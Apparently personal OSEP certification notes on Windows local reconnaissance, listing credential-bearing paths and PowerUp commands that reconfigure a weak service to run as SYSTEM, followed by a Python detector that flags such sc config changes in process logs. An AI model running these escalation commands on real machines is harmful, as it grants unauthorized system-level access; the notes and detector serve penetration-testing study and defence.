OSEP Notes

Local Reconnaissance Windows

Local Enumeration

  • whoami /priv

  • Files and Directories

C:\program files\

C:\program files (x86)\

C:\users\bob\document

C:\users\bob\desktop

C:\users\bob\.ssh

C:\program Files\setup\mail.ps1

C:\inetpub\wwwroot\login.aspx (if the web app uses MSSQL)

  • Local Session

Available tokens of other users/services

  • Vulnerable Service

ipmo .\powerup.ps1

Invoke-AllChecks

sc.exe qc vuln

sc.exe config vuln start= demand  # Change start type

sc.exe config vuln obj= "NT AUTHORITY\SYSTEM"  # Change the account the service runs as

Invoke-ServiceAbuse -Name 'vuln' -UserName 'red\alice'  # Abuse
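A defender-side view of the service commands above, as an added example that is not part of the original notes: it parses process-creation command lines and flags `sc config` changes to a service's start type, binary path or run-as account, plus the PowerUp function names used here. The record layout (time, host, user, command line) and the sample records are constructed for illustration.

```python
import re

TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')   # words, keeping quoted runs together
WATCHED = {"obj": "run-as account changed", "start": "start type changed",
           "binpath": "binary path changed"}
PRIVILEGED = {"localsystem", ".\\localsystem", "nt authority\\system"}
PS_MARKERS = ("invoke-allchecks", "invoke-serviceabuse")  # PowerUp functions named in the notes

def parse_sc_config(cmdline):
    """Return (service, {option: value}) for an 'sc config' command line, else None."""
    tokens = [t.replace('"', "") for t in TOKEN.findall(cmdline)]
    if not tokens or tokens[0].lower().rsplit("\\", 1)[-1] not in ("sc", "sc.exe"):
        return None
    args = tokens[1:]
    if args and args[0].startswith("\\\\"):        # optional \\server argument
        args = args[1:]
    if len(args) < 2 or args[0].lower() != "config":
        return None
    service, opts, i = args[1], {}, 2
    while i < len(args):
        key, sep, val = args[i].partition("=")
        if sep and not val and i + 1 < len(args):  # "obj= value" form
            i += 1
            val = args[i]
        if sep:
            opts[key.lower()] = val
        i += 1
    return service, opts

def findings(log_lines):
    """Return (user, service, reason, severity) for each suspicious record."""
    out = []
    for line in log_lines:
        _ts, _host, user, cmd = line.split(" ", 3)
        out += [(user, None, f"PowerUp function {m}", "medium")
                for m in PS_MARKERS if m in cmd.lower()]
        service, opts = parse_sc_config(cmd) or (None, {})
        for key, reason in WATCHED.items():
            if key in opts:
                high = key == "obj" and opts[key].lower() in PRIVILEGED
                out.append((user, service, reason, "high" if high else "medium"))
    return out

SAMPLE = [  # constructed records: time host user command-line
    r'2024-05-01T10:00:01Z WS01 red\alice powershell -c "ipmo .\powerup.ps1; Invoke-AllChecks"',
    r'2024-05-01T10:01:10Z WS01 red\alice sc.exe qc vuln',
    r'2024-05-01T10:02:30Z WS01 red\alice sc.exe config vuln start= demand',
    r'2024-05-01T10:02:41Z WS01 red\alice C:\Windows\System32\sc.exe config vuln obj= "NT AUTHORITY\SYSTEM"',
]
```

Calling `findings(SAMPLE)` returns three findings; the read-only `sc.exe qc` query is not flagged.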

Last updated 1 year ago